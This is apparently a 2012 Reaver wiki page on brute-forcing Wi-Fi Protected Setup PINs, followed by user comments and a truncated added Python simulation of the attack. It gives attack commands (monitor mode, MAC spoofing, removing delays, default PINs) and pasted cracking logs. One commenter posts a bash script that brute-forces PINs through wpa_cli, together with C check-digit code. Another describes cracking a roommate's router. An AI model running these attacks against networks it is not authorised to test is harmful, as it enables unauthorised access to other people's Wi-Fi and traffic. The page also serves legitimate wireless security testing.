
reaver-wps - Brute force attack against Wifi Protected Setup

HintsAndTips
Hints and tips on using Reaver
Updated Jan 17, 2012 by cheff...@tacnetsol.com

Prerequisites

- You must be running Linux
- You must have a wireless card capable of raw injection
- You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface, and do so before creating the monitor interface, so that mon0 inherits the spoofed address. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Default Pins

It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.

Errors and Warnings

It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out-of-order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.

However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:

- Does the target AP support WPS and is WPS enabled?
- Did you put your wireless card into monitor mode?
- Did you specify the monitor mode interface with the -i option?
- Do you have a good signal from the AP?

If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:

- Linux distro, distro version, and architecture (32 bit or 64 bit?)
- Wireless card and driver
- Pcap file demonstrating the issue, if possible

Comment by basti.me...@gmail.com, Dec 30, 2011
Could you list the instructions for capturing the entire process with pcap here as well? Thanks in advance :-)

Comment by project member peac...@tacnetsol.com, Dec 30, 2011
tcpdump -i mon0

Comment by yougotpw...@gmail.com, Dec 31, 2011
Can you add a list of vulnerable Access Points?

Comment by yougotpw...@gmail.com, Dec 31, 2011
A good start is the following list from http://www.kb.cert.org/vuls/id/723755:

Vendor                                   Status
AVM                                      (Brute-Force Timeout Protection)
Belkin, Inc.                             Affected
Buffalo Inc                              Affected
D-Link Systems, Inc.                     Affected
Linksys (A division of Cisco Systems)    Affected
Netgear, Inc.                            Affected
Technicolor                              Affected
TP-Link                                  Affected
ZyXEL                                    Affected

I added AVM FritzBox! which prevents the attack by locking WPS after a few attempts.

Comment by ikehi...@gmail.com, Dec 31, 2011
I'm a complete noob. Just downloaded VMware and Ubuntu for the first time yesterday. Install went well. Downloaded BT5 to access WEP. Worked well. Just downloaded Reaver and I have no idea where to start. How do I implement Reaver?

Comment by ikehi...@gmail.com, Dec 31, 2011

Also I am using an ALFA AWUS036H wireless card with the rtl8187 driver.

Comment by entner....@gmail.com, Jan 2, 2012
Is it possible to test only one key to see if it works?

Comment by entept...@gmail.com, Jan 2, 2012
Yep, use --pin 1234567890

Comment by lhstrump...@gmail.com, Jan 4, 2012
Your prereqs say run Linux, but does OS X 10.7 qualify since it's basically Unix, right? If not, what flavor of Linux do you recommend?

Comment by patricks...@gmail.com, Jan 5, 2012
Maybe you should take a look into the folder /etc/reaver/ and open a file "macnumber.wpc" and you will see some answers there.

Comment by omnivor...@hotmail.com, Jan 6, 2012
Has anyone looked into whether the -L argument, the ignore lock down argument, actually is useful? I have tried this on two different APs without any success. It tries out all the combinations (first half) of the pin and when it reaches the last pin combination it just keeps repeating that last one. What I'm wondering is, when the AP is in "lock mode", does it accept the pins / the M4 packet we are sending? I'm starting to wonder whether they by default send NACKs whenever they are in "lock mode" even though I at some point during a "lock mode" am sending a valid pin. Not confirmed, only a guess. Has anyone looked into this any further or might have any idea regarding this?

Comment by EsperHa...@gmail.com, Jan 6, 2012
Reporting success in retrieving a WPA2 TKIP/AES PSK key from a TP-LINK AP using WPS Reaver ... However I was in a hurry in the morning so I forgot to check how much it took me to retrieve the pin. I don't know if reaver stores log files somewhere .. but I can't seem to find them. Regards. Sorry I can't reveal the model number of the AP, just it is TP-LinK __ ..... WPS Reaver team R0ckZ

Comment by EsperHa...@gmail.com, Jan 6, 2012
@ obrei Reaver v1.3 is out ... try it and report !! I have an AWUS036H, it is working with backtrack5 like a charm. Be sure to use airmon-ng start wlan0 first.

Comment by obrei...@gmail.com, Jan 6, 2012
Well, at least starting the tool succeeded: the problem was 'SUDO' :))) - so tip to all newbies like me - always type "sudo" to get root privileges! Cheers:))!

Comment by obrei...@gmail.com, Jan 8, 2012
Hi again, want to report an odd situation here. PIN was cracked but no PSK was displayed:

[+] 97.46% complete @ 2012-01-07 17:52:58 (2 seconds/attempt)
[+] 97.51% complete @ 2012-01-07 17:53:08 (2 seconds/attempt)
[+] 97.55% complete @ 2012-01-07 17:53:18 (2 seconds/attempt)
[+] 97.60% complete @ 2012-01-07 17:53:28 (2 seconds/attempt)
[+] 97.65% complete @ 2012-01-07 17:53:39 (2 seconds/attempt)
[+] 97.69% complete @ 2012-01-07 17:53:49 (2 seconds/attempt)
[+] WPS PIN: '33797793'

[+] AP SSID: 'NET_12'

Any help and ideas why?? Thanks!

Comment by qpe...@gmail.com, Jan 8, 2012
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 1C:BD:B9:8C:FF:48
[+] Switching mon0 to channel 1
[+] Associated with 1C:BD:B9:8C:FF:48 (ESSID: TALKTALK-8CFF48)
[+] Trying pin 75353643
[!] WARNING: Receive timeout occurred
[+] Trying pin 75353643
[!] WARNING: Failed to associate with 1C:BD:B9:8C:FF:48 (ESSID: TALKTALK-8CFF48)
[!] WARNING: Receive timeout occurred
[+] Trying pin 75353643
[+] Key cracked in 113 seconds
[+] WPS PIN: '75353643'
[+] Nothing done, nothing to save.

Is it a bug or am I doing something wrong?

Comment by grayoa...@gmail.com, Jan 8, 2012
Poor connection strength, use sudo aireplay-ng -9 wlan0 to check the strength. You want to at the very least be in the 50's, preferably the 40's or below.

Comment by qpe...@gmail.com, Jan 9, 2012
1C:BD:B9:8C:FF:48 -56 27 0 0 1 54e WPA2 CCMP PSK TALKTALK-8CFF48
It's not poor connection, I cracked one password on over 80's.

Comment by adam.rzo...@baruchmail.cuny.edu, Jan 11, 2012
Little question (since I'm a total Linux noob): how do I update reaver to the newest current revision (exact commands appreciated)? Google and looking everywhere on this page have yielded no results.

Comment by ObiDanKi...@gmail.com, Jan 12, 2012
Yo ad, what I did was this. The dude whose program it is mentioned a 1.4 update fairly soon, but if you really can't wait....

Download Reaver 1.3. Then go to the revisions page, you can reach it by going to http://code.google.com/p/reaver-wps/source/browse/
Clicking on trunk, then src. O.k that was the easy bit.
Now click on the top file on the right hand side, 80211.c. Scroll down by file info and click "view raw-file". In firefox "file... then.. Save page as". Keep the name the same.
Do the same for all 43 odd files.
Once you have all the files grouped, create a directory on your desktop called src. Then delete the src folder from inside your reaver1.3 directory and replace it with the src you've just created/downloaded.

O.k almost done....
Now back to the googlecode page and underneath the src folder on the left should be common, crypto etc. Go in each of these folders and look for any newer revisions than r3..... if you see for example r62 or whatever, then do the same old view raw... save page as.... and replace that single file with the one in your reaver 1.3 directory...
Once you've updated all the files you're almost done but not quite. You need to then change a few of the files to executable. Use chmod ugo+x "filename" to accomplish this.
And then just ./configure, make and make install...
Easy.....(?) ;) Or wait for the next release haha ;)

Comment by patricks...@gmail.com, Jan 12, 2012
Maybe if we ask cheff gently, he would put reaver 1.4 with those revisions up for download.... :-)

Comment by ObiDanKi...@gmail.com, Jan 12, 2012
Haha might be a good call dude ;).
I'm still struggling to get any results with reaver. I've been getting somewhere with wpa_supplicant though, getting some legitimate EAPOL transactions happening.
The whole beacon frame/associate thing wasn't happening with reaver on this system. Basically reaver would say associated using the -A switch and using aireplay to associate, it would say trying pin, but no EAPOL packet transaction happened. It just timed out.
So far in my <owboi <od3r experiments it would seem that given a few tweakages, wpa_supplicant has single-handedly been able to scan for APs, associate properly with them, and then start the EAPOL transaction that has been talked about with all the people who have reaver functioning normally (grinds teeth, not like I'm jealous or anything hahahaahah ;). I guess that was its whole purpose in the first place, it begs the question why so many tweaks were needed to get it there though ;). Maybe my system is just not up to scratch =P.
Anyways so I have the EAPOL transactions going now, they go as such...
EAPOL start, request identity, response identity, request expanded type, response expanded type, failure.
I'm taking it from other people's posts this is the way reaver should operate? Any hints from those who've got it working would be cool!
Cheers - dan

Comment by grayoa...@gmail.com, Jan 12, 2012

What is the wireless card you're using? And you've verified that injection is working after putting it into monitor mode? (sudo airmon-ng start wlan0)

Comment by mkpi...@gmail.com, Jan 12, 2012
How do you verify injection is working?

Comment by marcodem...@gmail.com, Jan 12, 2012
Good question. I get timeouts all the time at all access points with different signal strengths, horribly unstable, sometimes even association failed. I don't buy it that the signal is too weak, more likely the driver. Would be nice to get more info in a future version: timeout (reason: ...). Oh well, great tool anyway, gj guys, I hope I'll get it working one day.

Comment by grayoa...@gmail.com, Jan 12, 2012
Assuming you have the necessary aircrack-ng package installed, enable monitor mode first (sudo airmon-ng start wlan0), then to verify injection is working use (sudo aireplay-ng -9 wlan0).

Comment by MoHaMeDW...@gmail.com, Jan 12, 2012
I am using backtrack 5 with an ALFA AWUS036H and it works fine when cracking WEP..... but I'm having a problem getting reaver to work. Here is what I do:

./walsh -i mon1
Scanning for supported APs...
B8:A3:86:3F:0C:92 WeWe
00:24:17:95:55:85 EL-safa7

Hit ctrl+c to stop scanning and typed ./reaver -i mon1 -b B8:A3:86:3F:0C:92 -vv -c 11

Waiting for beacon from B8:A3:86:3F:0C:92
Switching mon1 to channel 11
[+] Associated with B8:A3:86:3F:0C:92 (ESSID: WeWe)
[!] WARNING: Failed to associate with B8:A3:86:3F:0C:92 (ESSID: WeWe)
[+] Associated with B8:A3:86:3F:0C:92 (ESSID: WeWe)
[+] Trying pin 15772251
[!] WARNING: Last message not processed properly, reverting state to previous message

So I verified injection:

03:29:04 Trying broadcast probe requests...
03:29:04 Injection is working!
03:29:06 Found 1 APs
03:29:07 B8:A3:86:3F:0C:92 - channel: 11 - 'Andrew Fam'
03:29:08 Ping (min/avg/max): 9.083ms/47.347ms/73.673ms Power: -59.37
03:29:08 30/30: 100%

and tried to authenticate with this AP:

aireplay-ng -1 0 -a B8:A3:86:3F:0C:92 mon1
No source MAC (-h) specified. Using the device MAC (00:C0:CA:45:29:A0)
03:32:01 Waiting for beacon frame (BSSID: B8:A3:86:3F:0C:92) on channel 11
03:32:01 Sending Authentication Request (Open System) [ACK]
03:32:01 Authentication successful
03:32:01 Sending Association Request [ACK]
03:32:01 Association successful :-) (AID: 1)

That's what happens with both APs. What do I do now? Note: no clients on either AP.

Comment by adam.rzo...@baruchmail.cuny.edu, Jan 15, 2012
obidan~ I have no fucking clue what the fuck you wrote

Comment by ObiDanKi...@gmail.com, Jan 16, 2012
Might be best to wait for the next official release then, sunshine. ;)

Comment by qpe...@gmail.com, Jan 18, 2012
Hi, is there any easy way to get reaver 1.4 beta without downloading file by file from trunk?

Comment by patricks...@gmail.com, Jan 18, 2012
@qpe http://code.google.com/p/reaver-wps/issues/detail?id=140#c6

Comment by costell...@gmail.com, Jan 18, 2012
Any tutorial on walsh? To scan APs and see who has WPS on.

Comment by patricks...@gmail.com, Jan 18, 2012
@costell put your card in monitor mode with airmon-ng, then:
walsh -i mon0 -C -s
or
wash -i mon0 -C -s

Comment by costell...@gmail.com, Jan 18, 2012
Thx, now I see I need to install walsh too.

Comment by patricks...@gmail.com, Jan 18, 2012
walsh and wash are the same. The name has been changed from one revision to another.

Comment by costell...@gmail.com, Jan 18, 2012
It's saying command not found. I have installed reaver 1.3.

Comment by patricks...@gmail.com, Jan 18, 2012
@costell http://code.google.com/p/reaver-wps/issues/detail?id=140#c6

Comment by patricks...@gmail.com, Jan 18, 2012
Go into the directory where you downloaded reaver, then into src:
make cleanall or make distclean
./configure
make
make install

Comment by costell...@gmail.com, Jan 18, 2012
Any idea where to find it? I installed reaver like this:
apt-get update
apt-get install reaver

Comment by patricks...@gmail.com, Jan 18, 2012
@costell.... do you know "google"? Well, try this one (found on google):
sudo apt-get remove paket_name

Comment by patricks...@gmail.com, Jan 18, 2012
@ costell and after this remove you reinstall it with the svn like above.

Comment by Chrifis...@gmail.com, Jan 18, 2012
Tried Reaver 1.3 (ath9k) against my DIR-655 rev.A2 (1.35NA Firmware). I can say that both Reaver and the AP's WPS are buggy. Last night I could run Reaver at full speed and it would get receive timeouts around the 12th pin or so. Today I can run full speed for 24 pins once and 60 pins later. Last night I was toying around with the -d and -r options. I had -d 4 -r 12:20 and it started timing out around the sixth cycle. Cycle being 12 pins then 20 second sleep. Tried -d 4 -r 12:30 and same thing. Tried -d 5 -r 10:30 and same thing. Today I tried -d 5 -r 10:60 and it made it a little further but same thing.

[+] 18.05% complete @ 2012-01-18 15:56:55 (2 seconds/attempt)
[+] Trying pin 57689661
[+] Trying pin 12519668 <---- Notice the duplicates?
[+] Trying pin 12519668 <-----
[+] Trying pin 78419667
[+] Trying pin 60579669 <---- Again
[+] 18.07% complete @ 2012-01-18 15:57:03 (2 seconds/attempt)
[+] Trying pin 60579669 <----
[+] Trying pin 24479660
[+] Trying pin 95259666 <---- Again
[+] Trying pin 95259666 <----
[+] Trying pin 04929666
[+] 18.11% complete @ 2012-01-18 15:57:11 (2 seconds/attempt)
[+] Trying pin 80589662
[+] Trying pin 80589662
[+] Trying pin 80589662
[!] WARNING: Receive timeout occurred
[+] Trying pin 80589662
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred

Receive timeout repeats for a while until Reaver freezes. Quit Reaver and try again and it works fine. Works perfectly as long as I keep restarting every time it starts getting receive timeouts.

I'm trying to track the issue so I have Wireshark open and am watching the EAP conversations. I've noticed that Reaver sends duplicate packets all the time when the router only sends one.

Router >>>>>>> Computer -- Request, WPS, M1
Computer >>>>>> Router -- Response, WPS, M2
Computer >>>>>> Router -- Response, WPS, M2
Router >>>>>>> Computer -- Request, WPS, M3
Computer >>>>>> Router -- Response, WPS, M4
Computer >>>>>> Router -- Response, WPS, M4
etc.....

When it starts to get the receive timeout error this is what shows up in Wireshark:

Computer >>>>>>> Router -- Start
Router >>>>>>>>> Computer -- Request, Identity (Duplicate 2)
Computer >>>>>>>> Router -- Response, Identity (Duplicate 3)
Router >>>>>>>>> Computer -- Failure
Computer >>>>>>> Router -- Failure
Computer >>>>>>>> Router -- Response, Identity (Where did this come from?)
Computer >>>>>>> Router -- Failure

Then a little later it tries the Start packet again and sometimes request AND response for identity and that's it. There's a lot of association going on back and forth. I have to quit Reaver and restart and everything works fine again. I don't think the AP is getting bogged down, I think there's an issue with Reaver or something on my end. The AP loses all internet connectivity if I try even one PIN lol. Takes like 30 seconds after I stop before normal operation is restored. I just updated to Reaver 1.4 and will run some tests tonight.

Comment by patricks...@gmail.com, Jan 19, 2012
@ Craig, I also made tests with another computer with Kubuntu on it, with all my different wireless adapters, on those APs where I got in with the computer with Backtrack on it. So I see those errors like time out, or unable to connect, 0x2, 0x3; after 2 minutes I stop those tests because it makes no sense, I know your program is running right (almost 90% of it). I also tried with those compat drivers and patches without success.
I also know these connection problems with wicd, which have nothing to do with reaver, but this thing does not do what it should and I have not found a bullet proof solution to get it to work. Well, I just took a look at Aircrack and it seems to me that they made their own patches for many different chipsets.

I am not sure with my analysis, it's my feedback, and might be an idea to solve some issues; for me not every error message equals a bug. Well, I have big respect for your programming work. What IDE are you using?

Comment by qpe...@gmail.com, Jan 21, 2012
I have ubuntu 11.10 with kernel 3. Does someone have a wifi patch to make mon0 for a reaver test?

Comment by gabethui...@yahoo.com, Jan 24, 2012
OK, I run BT5 with an Atheros AR9285 wireless card. I tested the connection strength with the command aireplay-ng -9 wlan0 and the results are:

00:55:15 Trying broadcast probe requests...
00:55:15 Injection is working!
00:55:17 Found 1 AP
00:55:15 Trying directed probe requests...
00:55:17 08:76:00:xx:xx:xx - channel: 10 - 'TISCALI1234'
00:55:18 Ping (min/avg/max): 2.989ms/14.891ms/26.811ms Power: -81.93
00:55:18 30/30: 100%

Then when I run ./walsh -i mon0 -C -s, I have these results:

Scanning for supported APs...
00:24:89:xx:xx:xx Vodafone-43270098

and nothing more. So which results of the command should I believe? walsh or aireplay-ng -9 wlan0?

In the end I tried ./reaver -i mon0 -b 08:76:FF:xx:xx:xx -vv, with no success:

[+] Waiting for beacon from 08:76:FF:xx:xx:xx
[+] Switching mon0 to channel 10
[+] Associated with 08:76:FF:xx:xx:xx (ESSID: TISCALI1234)

and no response. In the end I tried to crack tiscali because vodafone gives me request timed out and it is trying the same pin. How can I make it work?

Comment by saeed.y2...@gmail.com, Jan 26, 2012
It may help to find how to install reaver easily: http://www.theprojectxblog.net/apt-get-install-reaver-for-backtrack-and-backbox-linux/

Comment by qpe...@gmail.com, Jan 29, 2012
How do I make a cap file for the Reaver guys to check?

Comment by lawrence...@gmail.com, Feb 6, 2012
Here's something neat I found. I'm trying to crack my roommate's old router, just for the fun of it. He's set it up in his bedroom as a challenge, I do not have physical access to it, all he's given me is the name, so I'm not trying to break into a neighbor's router. He turned pale when I told him it was a Netgear (C0:3F:0E....), so as you can guess, he's pretty easy to scare.

Reaver is stuck at 99.99% complete, and is trying the same PIN over and over for hours, getting constant "Receive timeout occurred" messages.

When I browse through the session file (/usr/local/reaver/C03F0E...wpc according to docs, but actually appeared in /etc/reaver/C03F0E...wpc on my system) I see a little more than 90% of the file is 4 digits long, and the rest is 3 digits long. And I show:

# cat C03F0E...wps | sort | less

Gives me a neat list of the numbers 0-1000, with some duplication due to sort orders. Interestingly, there's a 1 at the top of the list. It's not 001, or 0001, it's just 1.

# cat C03F0E...wps | sort | wc

11003 lines.

# cat C03F0E...wps | sort | uniq | wc

11001 lines. And one line was a 1. Not 001 or 0001. I'm guessing the solitary 1 was a placeholder for some successful reply back from the router; since it appears early in the file, I'm guessing it was a placeholder for a salted four digit number which gave a successful output.

So I have 11,003 separate attempts, two lines being discarded as two separate halves (identical), ignoring one line as a lone 1 (WPS PIN is 4 digits then 3 digits then a check digit), and the router starts giving me receive timeouts at 99.99% through.

I didn't do so well at Probability in Statistics in Engineering school, and my programming style is so much brute force and ignorance that I once got a job offer from Microsoft. I'm good at analog electronics, small signal to big power.

Why did it take that long? We have 10^4 on the first, so 0000-9999. We have 10^3 on the second portion of the PIN, so 000-999. 11,000 possibilities, each portion of the PIN independently verified, ignoring the check digit which is basically a joke. I expect that once Reaver knows the correct first 4 digits, or the correct last 3 digits, it keeps on sending "random" digits for that already-known portion until it gets confirmation for the second part of the PIN, and then just gives both known correct portions at once to get in. (Why try the known PIN portions over and over? It would be obvious in log files.)

Statistically, we have a 50% chance of catching the first 4 digits within the first 5000 tests. Statistically, we have a 50% chance of catching the last 3 digits within the first 500 tests. 50% chance out of 11,000 tests. 5500 tests should get 50% penetration. Since we're doing both concurrently and calculating a check digit for each one, we should be finding the last three digits pretty quickly, since they're a sequence of numbers being repeated 2.5 times in the time it takes us to get to 50% through the 4 digit portion. By my logic, Reaver finds the last three digits before it even gets halfway through the 4 digit portion. Without remembering the math to calculate the odds, we should find the whole thing half the time in about 4500 tries is my educated guess, but as I've said, I didn't do really well in Probability and Statistics ("D stands for Degree!").

I'm guessing the PIN # that Reaver is stuck at is the PIN number, and the router needs a button press (software or hardware) to allow short-term PIN access, and it's ignoring me until I press the button. Either that, or reaver exhausted everything and just doesn't give up gracefully?

Am I on the right track, before I admit a measure of defeat and ask my roommate to press the button during a Reaver session?

Before I set up a cron job to try this WPS pin Reaver stopped at and ask him to press the button at some random time when I'm not home (as if he was associating a friend's iPhone or something)...

Thanks again for Reaver. My roommate isn't complaining about his high Internet bills now that I've shown that I can get into his D-Link in a few hours - actually, the D-Link only took about 2 hours. :)

Comment by jb...@godswind.org, Feb 11, 2012
I tried out reaver 1.4 on my gateway cable modem (reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv). It took a couple of hours (low PIN), and then spit out all the info. So I decided to try a few options, and played with changes to my Wi-Fi setup and using different USB air cards. (I'm using BT5r1 in VMware.) At some point, I discovered that I was unable to associate with my AP. If it's not too late, I'll make a long story short... Reaver will only associate with my AP if ESSID broadcasting is enabled. If there is a workaround, it would be nice to find it in the FAQ & wiki. Thanks so much for a great tool.

Comment by ObiDanKi...@gmail.com, Feb 12, 2012
Yo lawrence. Here's a workaround I've worked on for a little bit. ;) (ubuntu 10.04)
Not being a big-head mcgee but this is fairly advanced; if you're new to linux, and unless you're feeling brave, best not to attempt this, else ya might mess ya shizniz up.

The way the wps breach works, as I found out fairly recently, is that you send a full 8 digit wps-pin at all times. 7 digits + checksum. Sending 4 digits only will not return the anticipated M5 message that we so fondly wish to caress lovingly.

You can test this manually by doing the following.
Install wpa_supplicant if it isn't already installed.
Disable Network Manager autorespawn with "sudo gedit /etc/init/network-manager.conf". Hash out (#) respawn.
You then need to sudo gedit the /etc/wpa_supplicant.conf file with the following:

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP="your user name"
update_config=1

After doing this, running the following script should bring down the Network Manager and wpa_supplicant respectively. Here is a script I wrote au manuel. Nano and chmod u+x that shit. WARNING!! THIS IS SYSTEM SPECIFIC!! What we are trying to do with this script is kill network manager and wpa_supplicant and "reload" wpa_sup with the desired command line switches.

#!/bin/bash
# Kill NetworkManager and any running wpa_supplicant, then restart
# wpa_supplicant on wlan0 with our own config (system specific).
sudo kill -9 $(ps -A | grep Network | awk '{print $1}') && sleep 1
sudo kill -9 $(ps -A | grep wpa | awk '{print $1}') && sleep 1
echo 'Killing Network Manager & Wpa Supplicant' && sleep 1
echo "Done"
sudo ifconfig wlan0 up && sleep 1
sudo wpa_supplicant -Dwext -i wlan0 -c/etc/wpa_supplicant.conf -B
echo 'Bringing up Wpa Supplicant in interactive mode' && sleep 1
echo 'Done'
exit 0

After that you should be able to simply type wpa_cli and bring up wpa_cli in interactive mode.
From there the way forward is wps_reg "BSSID" "8Dig pin" (00000000 is a good test subject ;)
Having a running copy of wireshark or at the very least tcpdump is probably a fairly good idea! ;) (and by fairly I mean vitally ;) Have a brief scopage at this. You are looking for EAPOL M-messages. If it pings back up to M4, you're ready to rock.

Consult reaver documentation for how the process works, but if you do it au manuel you're going to need an EAN-8 calculator, because technically speaking the first 7 digits are the pin and the 8th is a checksum. For example... pin 1234567 (0) = 12345670, 2345234 (3) = 23452343. You can find these online. But they are essential to the wps_pin cracking methodology.

The following script I wrote (with assistance and kudos to assister! You know who ya are! ;) automates the process. Please bear in mind though this is very bazik shit here, there's no error checking, that sorta thing. Hey, I'm just lurning programming, give me a brake!

#!/bin/bash
# Walk the first half of the PIN space (0000..9999), pad the second half
# with 000, let ean8 append the check digit, and hand each PIN to wpa_cli.
for i in {0..9999}; do
    code=$(printf "%04d000" "$i")
    ans=$(ean8 "$code")
    echo "$(date +%H:%M:%S)"
    echo "$(date +%H:%M:%S)" >> /home/User/log.txt
    echo "wpa_cli wps_reg BSSID $ans"
    echo "wpa_cli wps_reg BSSID $ans" >> /home/User/log.txt
    wpa_cli wps_reg BSSID "$ans" > /dev/null   # Optional redirect to /dev/null
    sleep 9
done

Changing "sleep" gives a delay between pin attempts. I've heard this can be a good thing in the world of slowly responding APs.

Right about now, my little funk soul brothers/sisters, you are probably thinking well where is the ean8 program that is called from within this little script.... skadoosh! nano it, save it as ean8.c, compile it, and stick it in /bin where it can be easily found! ;) Note all credit to an awesome senior for this little module!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* WPS PIN check digit: digits 1,3,5,7 weighted 3, digits 2,4,6 weighted 1.
 * Build with 'make ean8' or 'gcc -o ean8 ean8.c', then move the binary into /bin. */
int main(int argc, char *argv[])
{
    int i, odd_sum = 0, even_sum = 0, sum, check_digit;
    char *base;

    if (argc != 2) {
        fprintf(stderr, "Error: Wrong number of arguments\n");
        exit(EXIT_FAILURE);
    }
    base = argv[1];
    if (strlen(base) != 7) {
        fprintf(stderr, "Error: Argument is not 7 characters\n");
        exit(EXIT_FAILURE);
    }
    for (i = 0; i < 7; i += 2) {   /* Odd digits (positions 1, 3, 5, 7) */
        odd_sum += base[i] - '0';
    }
    for (i = 1; i < 7; i += 2) {   /* Even digits (positions 2, 4, 6) */
        even_sum += base[i] - '0';
    }
    sum = odd_sum * 3 + even_sum;
    check_digit = (10 - (sum % 10)) % 10;
    /* Print the full 8-digit PIN so the script above can pass it straight to wps_reg */
    printf("%s%d\n", base, check_digit);
    return EXIT_SUCCESS;
}

O.k a couple more tweaks and you're almost all set... easy peasy... right? ;)
In wireshark set the time setting to "standard time" (i.e. not packets), then hours, minutes, seconds.
O.k good job. Tweak the wps.sh (main shell file) to include the variables you need (bssid and path for log).
Set wireshark recording, execute the wps.sh file, it should spit back the time, the command line wps_reg etc. and the pin being tried in the terminal it's running in. This is groovy. Check wireshark and make sure you're getting constant M4 messages (i.e. your sleep variable isn't set too low, 9 seems reasonable).
After either the program ends (long flipping time) or you terminate the program because you got tired of waiting. Yawn =P
Stop wireshark. Export the data to a log file. Then just run the command more log.txt | grep M5 > Ihadadogandhisnamewasbingo.txt. Cross correlate this with the time in your other log file, and well done, you've successfully just cracked the first four digits of the wps_pin. (Note it's probably better to change the for loop from 0..9999 to something smaller like 0..1000 and attempt pins in smaller sections.)
It's a semi-automatic method, granted, but I'm thinking it wouldn't be too hard to automate the rest of the process; perhaps in the open source spirit of things someone else can add to/improve this workaround. (I was just thinking of automating the logging and grepping section.)
And it's not a diss to the work of the reaver guys either, it's just me trying to find an alternate way of accomplishing the same ends! (As I couldn't get reaver working ;)!
"Freely we receive the knowledge, so freely we share it == the open sauce way?"
In the immortal words of the base radio operator in the quality snes classic 'starwing': Gooooooood luck! And cue awesome snes music. - 3nd
P.s Secure your networks & disable wps if you value your privacy!

Comment by ObiDanKi...@gmail.com, Feb 12, 2012
P.p.s code lines are somewhat messed up, you might need to give them a bit of structure!
If you manage to get this workaround working a) Hallelujah b) well done. Then a tiny bit of modification to the wps.sh script's first couple of lines will provide a means to test the second half of the pin as well.
The further plans to mod this script were to log in 1%ages {0..100} then execute the log dumping from wireshark/tcpdump, grepping for M5 messages & then cross correlating this with the other logfile generated by the wps.sh script. After returning a negative result, continuing with the next batch of pins {101..200} and so on and so forth until a positive result is achieved.
The whole thing is very zen/simple but it's a workaround nonetheless, for those not achieving desired results.
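The PIN structure that lawrence reasons about above (4 digits confirmed by the AP's reply to M4, 3 digits plus a check digit confirmed by the reply to M6, hence 11,000 candidates rather than 10^7) and the EAN-8 style check digit that ObiDan's ean8.c computes, carried through as an added Python example. This is not code from the reaver-wps project or from any commenter on this page. SimulatedAP, its 'nack-after-m4' / 'nack-after-m6' / 'm7' return values and the target PIN 12345670 are constructed for the example; real APs may also lock WPS after a few failures (the AVM behaviour mentioned in the comments), which this model deliberately leaves out so the attempt counts are the no-lockout worst case:

```python
"""WPS PIN check digit and the two-phase brute force, modelled offline.

Added example (not reaver-wps code). SimulatedAP is a toy registrar with
no lockout: it rejects a wrong first half after M4 and a wrong second half
after M6, which is all the search below relies on.
"""
from typing import Tuple


def wps_checksum(first7: str) -> int:
    """Check digit of a 7-digit PIN body: positions 1,3,5,7 weighted 3,
    positions 2,4,6 weighted 1 (same scheme as the ean8.c posted above)."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("PIN body must be exactly 7 digits")
    acc = 0
    for i, ch in enumerate(first7):
        digit = ord(ch) - ord("0")
        acc += 3 * digit if i % 2 == 0 else digit
    return (10 - acc % 10) % 10


def full_pin(first7: str) -> str:
    """7-digit body plus its check digit: the 8-digit PIN actually sent."""
    return first7 + str(wps_checksum(first7))


def pin_is_valid(pin8: str) -> bool:
    """True when the 8th digit is the right checksum for the first seven."""
    return len(pin8) == 8 and pin8.isdigit() and full_pin(pin8[:7]) == pin8


class SimulatedAP:
    """Constructed WPS registrar. try_pin() reports where the exchange stops:
    'nack-after-m4' = digits 1-4 wrong, 'nack-after-m6' = digits 5-7 wrong,
    'm7' = both halves right (a real AP hands over credentials in M7)."""

    def __init__(self, pin8: str) -> None:
        if not pin_is_valid(pin8):
            raise ValueError("AP PIN must carry a valid check digit")
        self.pin = pin8
        self.exchanges = 0  # full protocol runs the AP has answered

    def try_pin(self, pin8: str) -> str:
        self.exchanges += 1
        if not pin_is_valid(pin8) or pin8[:4] != self.pin[:4]:
            return "nack-after-m4"
        if pin8[4:7] != self.pin[4:7]:
            return "nack-after-m6"
        return "m7"


def crack(ap: SimulatedAP) -> Tuple[str, int]:
    """Recover the PIN half by half; returns (pin, exchanges used)."""
    # Phase 1: walk 0000..9999 for the first half, padding the second half
    # with 000. Anything other than a NACK after M4 confirms the first half.
    for a in range(10_000):
        half1 = f"{a:04d}"
        if ap.try_pin(full_pin(half1 + "000")) != "nack-after-m4":
            break
    else:
        raise RuntimeError("first half never confirmed; not a plain WPS registrar")
    # Phase 2: keep the confirmed first half fixed and walk 000..999.
    for b in range(1_000):
        candidate = full_pin(half1 + f"{b:03d}")
        if ap.try_pin(candidate) == "m7":
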